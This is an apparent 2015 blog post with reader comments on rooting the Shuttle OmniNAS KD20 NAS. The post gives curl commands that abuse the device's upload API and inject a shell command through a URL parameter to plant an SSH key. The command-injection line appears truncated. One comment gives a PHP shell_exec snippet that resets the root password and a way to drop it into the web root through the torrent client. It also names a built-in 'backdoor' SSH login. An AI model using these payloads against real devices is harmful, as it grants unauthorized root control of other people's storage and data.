There's always time to play

Tuesday, February 17, 2015

Getting root SSH access on Shuttle OmniNAS KD20

In the previous post I detailed a security vulnerability in the firmware for the Shutte OmniNAS KD20. In an attempt to remedy Samba bug #10584 I was trying to get more direct access to my OmniNAS. I already tried to start sshd and telnetd, but with no real success (they were running, logging in was a problem though).

I wanted to get in without making too much changes, by putting a SSH public key on the share and pointing SSHD to it. But since that didn't work out I copied /etc/passwd to the disk share and cat-ed it back (using tee as well) with my user's shell set to /bin/ash. That allowed me to log in after starting sshd, but adding my account to /etc/sudoers was required to get to the next level of control.

Once I was in and with root permissions I was able to diagnose why my initial attempt didn't work. A simple sshd -p 8022 -d showed me that there was a permissions 'problem', because SSHD is secure by default and ignores authorized keys with write permissions for other users. An additional chmod fixed that as well, which brings me to the following two lines to accomplish root SSH access to the Shuttle OmniNAS KD20:

curl -F 'userfile=@.ssh/;' 'http://192.168.x.x/filesystem/api-1.0/dir_action.php?type=upload'

curl -F 'userfile=@/dev/null;filename=test.txt' 'http://192.168.x.x/filesystem/api-1.0/dir_action.php?type=upload&p=%24('

In the above two lines the first line copies to the disk share, the second line copies it to /root/.ssh/authorized_keys, sets permissions that are acceptable for SSHD and starts sshd.

Now all you need to do is ssh root@192.168.x.x and you're in!

Happy hacking!


Sebastian Makowiecki said...

Every time after NAS is restarted the second command need to be run again..otherwise the connection is refused..can you point me in a direction so i could fid out how to make these awesome changes permanent? Thanks in advance.

Sebastian Makowiecki said...

Ok I think I get it know, thanks for these instructions.

Sebastian Makowiecki said...

So just in case anyone if wondering how to start sshd at boot time.

First follow the instructions above to get root acess to omninas.

Add a line:
/etc/rc.d/ start
to the file:

I have used vi for this purpose and added the line near the end of the file just before the last line "exit 0".
If you dont know how to use vi than find out before you use it because it might be tricky if you dont know how to.

Good luck.

Unknown said...

The first command simply says 'couldn't open file ".ssh/"'

Second command completes successfully. I try to ssh with root, it exchanges keys and asks for password. I don't know what the password is.

What am I doing wrong?

Michael Croes said...

Apparently you don't have an SSH public key. Be aware that responsibility is all yours.

Michael Croes said...

Apparently you don't have an SSH public key. Be aware that responsibility is all yours.

Vlad Dascau said...

I have the same problem with ... Can you please help ?

Lewzke said...
This comment has been removed by the author.
Lewzke said...
This comment has been removed by the author.
Lewzke said...

My method for rooting the KS10 is working nicely. I think works with any Shuttle NAS with the latest firmwares too.

Here are the steps:

1. create a setroot.php file with this script:
*<*?*php print shell_exec(“(echo \”foobar\nfoobar\n\” | sudo passwd root)”); *?*>*

I can't natively post this php file on this comment, please REMOVE THE STARS FROM THE BEGINNING AND AT THE END

2. Create a torrent with this setroot.php file
3. Add the torrent file to the NAS torrent client with the Transmission Remote GUI – Windows .
4. Remote GUI – > Change the location of the file with left click to the torrent, Set Data Location to usr/htdocs/admin/
5. run the php script opening from the browser : **omninas local ip**/admin/setroot.php
6. **omninas local ip**/admin/ssh.php -> enable SSH user:atonnas password:backdoor
7. connect to the SSH with putty, user: root password: foobar